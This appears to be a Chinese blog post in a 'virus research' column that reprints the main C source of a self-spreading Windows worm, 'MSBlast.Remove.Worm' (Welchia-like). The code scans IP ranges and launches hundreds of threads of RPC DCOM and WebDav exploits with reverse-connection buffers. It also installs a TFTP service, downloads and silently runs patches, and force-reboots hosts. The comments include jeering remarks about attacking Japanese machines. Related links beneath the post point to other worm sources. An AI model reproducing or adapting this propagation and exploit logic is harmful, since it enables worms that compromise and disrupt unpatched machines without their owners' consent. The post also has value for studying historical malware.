MSBlast.Remove.Worm W32蠕虫病毒主代码

最新推荐文章于 2024-01-08 20:15:25 发布
最新推荐文章于 2024-01-08 20:15:25 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 病毒研究 文章标签: null byte 路由器 service object 语言

BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE;  // not 2k or xp

if ( ReadRegServicePack(nSystemVer) ) 
return FALSE;  //已经安装了

//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);


if ( unOemCP == 437 && wMain == 9 && wSub == 1 )     //en
nLanguageID = 0;  //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
                  //管不了小欧洲~~ 俄罗斯牛人有自己的玩法~~
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 )  //cn
nLanguageID = 1;  //就是为这个来的~~
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 )  //tw
nLanguageID = 2;  //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp
nLanguageID = -1;  //偶好有干掉鬼子机器的冲动!  
                  //罢了,冤冤相报何时了~~~ 希望他丫的自新~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr
nLanguageID = 3;  //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}

if ( nLanguageID == -1)
return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}

char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){   //六分钟内未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);

Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot it~~~ 
Sleep(20000);               //说偶重启有过? 不重启补丁无效,找 Bill该死 说去~~~
}

return TRUE;
}

// IN:  始ip, B段数量, 是否随机,是否换WebDav  //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst  = TRUE;
u_long uComp;

for (int i=0;i< (nBCount * 256 * 256); i++){

if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好:)~~~
(BYTE)uComp == 0xc5    ||
(BYTE)(uComp>>8) == 0xc5  ||
(BYTE)(uComp>>16) == 0xc5 ||
(BYTE)(uComp>>24) == 0xc5 ||
(WORD)uComp == 0x9999   ||
(WORD)(uComp>>8) == 0x9999 ||
(WORD)(uComp>>16) == 0x9999  ) 
continue;


u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}

if ( myPara ){
if ( hThread )
CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)
hThread = CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId);
else
hThread = CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId);

Sleep(2);
}

//添加此处代码,避免首次执行时,线程中的 InterlockedIncrement(&g_CurThreadCount) 未来得及运行,一次性建立了N个线程的bug!
if ( bFirst && (i >= nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}

while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心,玩过了~~~
Sleep(2);

}

Sleep(60000);
}


//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
return;

//杀蠕虫
KillMsblast();

//卸载
SYSTEMTIME st;
GetLocalTime(&st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe(); 
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将自身文件删除了
}

srand( GetTickCount() );

memset(pPingBuffer, "/xAA", sizeof(pPingBuffer)); 
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补丁已经打够了!~~~


//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp & 修正子弹中的反向ip 和 端口

//打补丁
DoServicePackFunction();

//建立接收线程
DWORD dwThreadID;
HANDLE hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(LPVOID)NULL,0,&dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,同时处理多个反连
return;
CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}

Sleep(2000); //等待接收线程中的全局 rand bind port


u_long ulIP;
for(;;){ //估算了一下,普通机器2小时一循环


//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP &= 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);


//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);


//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);


//再扫描随机的IP, 数量1个 B段, rpc or webdav 
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~


KillMsblast();

}

//WSACleanup();

}


zhangjie0072
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
“冲击波”病毒(WORM_MSBlast.A) 安全补丁
11-03
遭受该蠕虫感染后可能出现以下现象,Word、Excel、Powerpoint等文件无法正常运行,弹出找不到链接文件的对话框,一些功能如“粘帖”等无法正常使用,控制面板出现异常、系统文件无法正常显示、Windows界面下的功能无法正常使用、计算机反复重新启动等现象。受到DDOS攻击的网站会因收到的服务请求太多而不能处理正常的请求,它可能消耗大量的带宽。WINNT、WIN2000、WINXP、WIN2003简体中文系统
莫里斯蠕虫源码
weixin_33734785的博客
11-10 1003
/* Magic numbers the program uses to identify other copies of itself. */#define REPORT_PORT 0x2c5d#define MAGIC_1 0x00148898#define MAGIC_2 0x00874697extern int pleasequit;/* This stops the...
VBS病毒(爱虫病毒) 源代码
miaozk2006的专栏
05-20 8047
说明:本人对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。如果你的系统不支持.vbs,可以将后缀改为.vbe Dim folder, fso, foldername, ...
dos蠕虫病毒
m0_69093237的博客
01-08 348
在DOS环境下运行的蠕虫病毒,其代码形式与任何其他计算机程序一样,是一系列可执行机器指令的集合。然而,由于DOS操作系统界面和功能的限制,早期的DOS蠕虫通常不具备现代网络蠕虫那样的复杂性,它们要通过共享文件夹、软盘传播或利用特定的系统漏洞进行复制和传播。请注意,以上只是一个极其简化的示例,真实的DOS蠕虫会有更复杂的机制来隐藏自身、寻找传播途径以及确保持续激活等行为。此外,针对DOS环境的蠕虫可能还会修改系统配置文件或者使用批处理脚本来实现自我复制和传播。这里是蠕虫的实际机器码,通常较长,省略展示。
vbs类蠕虫病毒
热门推荐
HI_REY的博客
03-20 1万+
代码仅供参考,如有因攻击他人电脑导致的损失作者概不负责!
蠕虫病毒
洛丹伦
02-23 2461
蠕虫病毒是一种常见的计算机病毒。它的传染机理是利用网络进行复制和传播,传染途径是通过网络和电子邮件。比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。蠕虫病毒的一般防治方法是:使用具有实时监控功能的杀毒软件,并且注意不要轻易打开不熟悉的邮件附
java编写蠕虫病毒_网络蠕虫病毒代码分析
weixin_39751076的博客
02-28 4876
实验步骤1、学生单击实验拓扑按钮,进入实验场景,进入目标机。2、学生输入账号admin ,密码123456,登录到实验场景中的目标机。如图所示:3、 代码分析:Set objFs=CreateObject(“Scripting.FileSystemObject”)(创建一个文件系统对象)objFs.CreateTextFile ("C:\virus.txt", 1)(通过文件系统对象的方法创建...
网络蠕虫理论、代码大全
09-19
蠕虫病毒基本原理、以及一些经典的实现代码(C#版). 另附:一些其他病毒的原理。 还有一些 病毒防范的基本小技巧。其中包括了 怎么搭建蜜罐,APP网络欺骗原理及对策分析研究、定位网络故障、基于陷阱网络的病毒捕获系统研究与应用、计算机蠕虫疫苗的进展跟趋势说明、以及一些重点案例。
冲击波(Worm.Msblast)病毒的最新安全补丁程序
05-06
微软推出的有关冲击波(Worm.Msblast)病毒的安全补丁程序,适用于WindowsXP。
一键关闭危险服务和常见病毒木马端口.zip
04-23
关闭nachi蠕虫病毒监听端口;关闭Telnet 和木马Tiny Telnet Server监听端口;关闭Rip 端口;关闭木马程序BackDoor的默认服务端口;关闭马程序黑洞2001的默认服务端口;关闭木马程序Ripper的默认服务端口;关闭木马...
蠕虫C代码
08-25
网上找的一个蠕虫代码,对本机影响而以,不会对网络造成影响,研究一下之后可以.不过请注意,我每次运行之后都是把改善出的东西删除了,因为实际作用要在重启之后才会发生作用.慎用!
《基于ACL的网络病毒过滤规则》毕业论文
06-06
3.2.1 示例一:Worm.Msblast 17 3.2.2 示例二:Worm.Sasser 18 3.2.3 示例三:Worm.SQLexp.376 19 3.2.4 示例四:Worm_Bagle.BE 20 3.2.5 示例五:Worm.MyDoom 21 3.2.6 示例六:Code Red & Code Red II 23 ...
智能关闭危险端口(bat文件)
12-28
echo 关闭nachi蠕虫病毒监听端口…………OK! ipseccmd -w REG -p "HFUT_SECU" -r "Block TCP/808" -f *+0:808:TCP -n BLOCK -x >nul ipseccmd -w REG -p "HFUT_SECU" -r "Block TCP/23" -f *+0:23:TCP -n BLOCK -x >...
RPC蠕虫病毒要技术源代码
zhangjie0072的专栏
06-01 3065
安全焦点网站于2003年7月21日发布了该漏洞的测试代码,现在的RPC蠕虫基本上是利用了该代码,我们现在转载该代码供大家研究。WINDOWS的RPC服务(RPCSS)存在漏洞,当发送一个畸形包的时候,会导致RPC服务无提示的崩溃掉。由于RPC服务是一个特殊的系统服务,许多应用和服务程序都依赖于他,因为可以造成这些程序与服务的拒绝服务。同时可以通过劫持epmapper管道和135端口的方法来提升权限
YY直播厅蠕虫病毒代码
yunchow的专栏
09-22 516
本来是可以直接通过&lt;script&gt;标签实现的,但是昨天被YY官方给屏蔽了。 下面的代码是通过img标签的onerror事件进行触发。所有看到这条消息的在线用户会被自动感染,并继续感染其他用户,因为这段代码有自我复制能力。.   &lt;img height="0" width="0" src="xx" onerror='t=this;function fn(){n = $("...
2.4G-WiFi连接路由器过程
weixin_39270987的博客
02-13 3116
WiFi的数据通信基于802.11协议进行,无线AP在工作时会定时向空中发送beacon数据包,基站(STA)从beacon中解析出AP的名称、加密方式等信息,从而发起连接。
springboot(酒店管理系统)
04-25
开发语言:Java JDK版本:JDK1.8(或11) 服务器:tomcat 数据库:mysql 5.6/5.7(或8.0) 数据库工具:Navicat 开发软件:idea 依赖管理包:Maven 代码+数据库保证完整可用,可提供远程调试并指导运行服务(额外付费)~ 如果对系统的中的某些部分感到不合适可提供修改服务,比如题目、界面、功能等等... 声明: 1.项目已经调试过,完美运行 2.需要远程帮忙部署项目,需要额外付费 3.本项目有演示视频,如果需要观看,请联系我 4.调试过程中可帮忙安装IDEA,eclipse,MySQL,JDK,Tomcat等软件 重点: 需要其他Java源码联系我,更多源码任你选,你想要的源码我都有! 需要加v19306446185
BP神经网络matlab实例.doc
最新发布
04-25
数学模型算法
设计.zip
04-25
设计.zip

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值